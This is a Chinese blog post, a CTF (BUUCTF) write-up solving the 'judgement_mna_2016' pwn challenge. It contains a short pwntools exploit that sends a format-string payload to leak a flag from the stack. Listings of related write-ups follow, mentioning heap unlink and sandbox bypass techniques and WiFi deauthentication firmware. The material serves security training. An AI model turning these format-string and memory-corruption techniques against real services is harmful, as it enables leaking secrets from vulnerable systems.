[BUUCTF-pwn]——judgement_mna_2016

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量234 收藏
点赞数 1
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115355638
版权

[BUUCTF-pwn]——judgement_mna_2016

还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试.

一看就知道这个地方储存的flag,
在这里插入图片描述
如果不确定. 可以去看下start函数的汇编, 执行main函数前就已经将flag写入了在这里插入图片描述
下面我们只需要计算偏移输出就好, 记得自己在目录下面写个flag.txt文件, 不然没办法调试的. 偏移0x1c 或者 0x20都可以
在这里插入图片描述

exploit

from pwn import *
#p = process('./judgement_mna_2016')
p = remote('node3.buuoj.cn',29011)
#gdb.attach(p, 'b *0x080487A2')
payload = '%32$s' # 28也可以
p.sendlineafter('Input flag >> ',payload)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之“judgement_mna_2016
Probeginner的博客
12-22 134
增强漏洞意识,有时候程序复杂但是抓住漏洞
judgement_mna_2016
z1r0的博客
02-16 295
judgement_mna_2016 查看保护 这里有一个格式化字符串,flag也被放到栈上去了。 这题目很简单,flag在栈上,动调一下看一下flag的偏移然后借助格式化打印出来就行了 28的偏移 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27337)
[BUUCTF]PWN——judgement_mna_2016(32位fmt)
mcmuyanga的博客
03-18 437
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
judgement_mna_2016(32位fmt)
m0_51251108的博客
11-05 151
judgement_mna_2016: 32位 逆向分析: main函数: alloca是一个内存分配函数,与malloc,calloc,realloc类似。 _alloca是在栈(stack)上申请空间,用完马上就释放. 输入函数,getline细看: 控制字符,可打印字符 init函数: load_flag函数: 解题: 没思路了,看其他师傅 麻了,原来有个格式化字符串漏洞, 上面大都废话 112/4=32 参考师傅:https://blog.csdn.net/mcmuyanga/art
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
diary_mna_2016
seaaseesa的博客
07-24 381
diary_mna_2016 首先,检查一下程序的保护机制 然后检查一下沙箱机制,发现禁用了execve还有open函数,但是没有堆sys_number的范围进行判断,因此,可以利用retf切换到32位模式绕过沙箱。 然后,我们用IDA分析一下,输入函数存在off by one。 程序自己用链表实现了一个堆块管理器。 其free功能使用的是unlink,将堆块取出、合并等操作,但是缺少链表完整性检查 这里,我们unlink不能直接将got表修改为system_add.
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 846
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 576
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
[BUUCTF-pwn] ciscn_华北半决赛_2018_pwn1
weixin_52640415的博客
02-07 412
没有回声有多么可恶。 程序本身不难,一是没有回应这样定位起来很麻烦只能一个个写上别输错了。二是代码有点长,基本上都没啥用。 看了半天发现就菜单3有用。 case 3u: read(0, &v16, 4uLL); v16 = htonl(v16); read(0, v14, v16); v6 = strtoul(v14, 0LL, 16); v21 = get_id(v6); read(
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 413
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuctf pwn wp(第八波)学会利用ROPgadget
月阴荒的博客
04-22 1606
inndy_rop 简单利用ROPgadget https://www.cnblogs.com/bhxdn/p/12347296.html
BUUCTF - PWN】rip
古月浪子的博客
03-19 1629
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1682
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值